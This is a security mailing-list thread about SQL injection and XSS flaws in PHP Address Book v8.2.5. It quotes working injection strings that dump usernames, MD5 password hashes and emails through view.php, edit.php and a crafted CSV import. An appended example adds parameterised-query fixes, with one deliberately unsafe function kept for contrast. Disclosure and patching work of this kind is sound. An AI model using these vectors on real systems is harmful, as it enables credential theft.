Date: Wed, 17 Apr 2013 17:27:45 +0300
From: Henri Salo <henri@...v.fi>
To: Doraemon Sk8ers <doraemon.sk8ers@...il.com>
Cc: oss-security@...ts.openwall.com
Subject: Re: Multiple vulnerabilities in PHP Address Book v8.2.5

Hello,

I believe CVE-2013-1748 #1 is a duplicate of CVE-2008-2565 as per OSVDB[1]. As far
as I know most of the security vulnerabilities reported to this project haven't been
fixed. I haven't verified this detail. What the php-addressbook project would need is
patches to fix all the issues you can find. Finding vulnerabilities is easy -
fixing in upstream is not. I can help you if you are willing to write patches.
It takes an hour or two :)

1: http://osvdb.org/45965

---
Henri Salo

On Wed, Apr 17, 2013 at 11:14:27AM +0800, Doraemon Sk8ers wrote:
> There is a SQL injection vulnerability and a reflected XSS in Simple PHP
> Address Book v8.2.5.
> The 2 vulnerabilities have been assigned the CVE identifiers CVE-2013-1748
> (SQLi) & CVE-2013-1749 (XSS) respectively.
> 
> # Software Link: http://sourceforge.net/projects/php-addressbook/
> # Version: v8.2.5
> # Tested on: v8.2.5
> # CVE : CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS)
> 
> 
> Details:
> -----------
> CVE-2013-1748 (SQLi)
> 
> We have discovered 3 pages which are prone to SQL Injection
> 
> 1.	/view.php?id=1
> The "id" parameter is vulnerable to SQL injection
> Injection Vector:
> 	/view.php?id=-1' union select '1','2','3','4',(select username from
> users limit 1),(select md5_pass from users limit 1),(select email from
> users limit 1),'8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41
> This injection vector will dump the username, md5 password and email
> of the first user in the user table onto the page itself
> 
> 2.	/edit.php
> Most of the fields on this page are vulnerable to SQL injection
> Injection Vector (inclusive of quotes):
> 	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
> This will dump out the ASCII value of the 1st character of the md5
> password of the first user
> 
> 3.	/import.php
> The same injection vulnerability as Point 2 above is also present in
> the import function
> Using the same injection vector, saved in a csv file
> 	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
> Similarly, this injection vector will dump out the ASCII value of the
> 1st character of the md5 password of the first user
> 
> The original input csv sample looks like this
> "Last name";"First name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> "thelastname";"thefirstname";"13.09.1951";"Street";"1234";"city, Country";"+1 123 456 789";"+2 345 678 910";"first.last@...l1.com";"+3 456 789 101";"+4 567 897 011";"first.last@...l2.net";"second street, 1234 secondcity, secondcountry";"+5 678 910 111"
> 
> The injected csv with the injected vectors looks like this
> "Last name";"First name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
> "";"injectedthrucsv";"13.09.1951";"'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'";"";"city, Country";"+1 123 456 789";"+2 345 678 910";"first.last@...l1.com";"+3 456 789 101";"+4 567 897 011";"first.last@...l2.net";"second street, 1234 secondcity, secondcountry";"+5 678 910 111"
<snip>
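An added example, not code from the advisory above or from the php-addressbook project, showing the shape of patch Henri asks for. It puts the two injection patterns the advisory describes (a quoted id spliced into a WHERE clause in a view.php-style lookup, and free-text cells from a form or CSV spliced into an INSERT in an import.php-style loader) next to their parameterised replacements, and adds output encoding for the reflected-XSS side (CVE-2013-1749). The `addresses` table and its `lastname`, `firstname` and `city` columns are assumptions, as is the function naming; an in-memory SQLite database stands in for the application's MySQL database so the file runs stand-alone. The real application's schema and import code are not on the page and are not reproduced here.

```php
<?php
// Added example (not code from php-addressbook or from the advisory).
// Table and column names are assumptions; an in-memory SQLite database
// stands in for the application's MySQL database.
declare(strict_types=1);

function connect(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Ask for real server-side prepares where the driver supports them,
    // instead of client-side quoting.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->exec('CREATE TABLE addresses (id INTEGER PRIMARY KEY, lastname TEXT, firstname TEXT, city TEXT)');
    return $pdo;
}

// Hypothetical vulnerable shape of a view.php-style lookup: the request value is
// spliced into the SQL text, so a quote inside ?id= rewrites the query.
// Kept only for contrast with viewSafe() below.
function viewUnsafe(PDO $pdo, string $id): array|false
{
    return $pdo->query("SELECT * FROM addresses WHERE id = '$id'")->fetch(PDO::FETCH_ASSOC);
}

// Hardened form: check the type, then bind. A bound value travels as data and
// cannot change the query structure, whatever quotes it contains.
function viewSafe(PDO $pdo, string $id): array|false
{
    if (filter_var($id, FILTER_VALIDATE_INT) === false) {
        return false; // non-numeric id: refuse before touching the database
    }
    $stmt = $pdo->prepare('SELECT * FROM addresses WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Hardened import.php-style CSV loader: every cell is bound, so a cell holding
// quotes or a sub-select is stored verbatim as text. Returns rows inserted.
function importCsv(PDO $pdo, string $csv): int
{
    $stmt = $pdo->prepare('INSERT INTO addresses (lastname, firstname, city) VALUES (:ln, :fn, :city)');
    $lines = preg_split('/\R/', trim($csv));
    array_shift($lines); // drop the header row
    $rows = 0;
    foreach ($lines as $line) {
        $f = str_getcsv($line, ';', '"', '\\');
        if (count($f) < 3) {
            continue; // malformed row: skip rather than guess at columns
        }
        $stmt->execute([':ln' => $f[0], ':fn' => $f[1], ':city' => $f[2]]);
        $rows++;
    }
    return $rows;
}

// Output encoding for the reflected-XSS side: encode at the point of rendering,
// with the charset stated, so stored quotes and angle brackets stay inert in HTML.
function renderCell(?string $value): string
{
    return '<td>' . htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

$pdo = connect();
// Constructed sample in the advisory's ';'-separated layout, reduced to three columns.
$csv = <<<CSV
"Last name";"First name";"City"
"thelastname";"thefirstname";"city, Country"
"";"quote'in'cell";"<b>not markup</b>"
CSV;
echo importCsv($pdo, $csv), " rows imported\n";
print_r(viewUnsafe($pdo, '1'));              // both forms agree on well-formed input
var_dump(viewSafe($pdo, "1' OR '1'='1"));    // rejected by the integer check before any query runs
$row = viewSafe($pdo, '2');
echo $row ? renderCell($row['firstname']) : '', "\n";
```

Run it with `php example.php`. The two things to notice are that `viewSafe()` never reaches the database for a non-integer id, and that the CSV cell containing quotes lands in the table as literal text and comes back out of `renderCell()` as entity-encoded HTML; neither the quote characters nor the sub-select syntax from the advisory's vectors have any meaning once every value is bound rather than concatenated.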

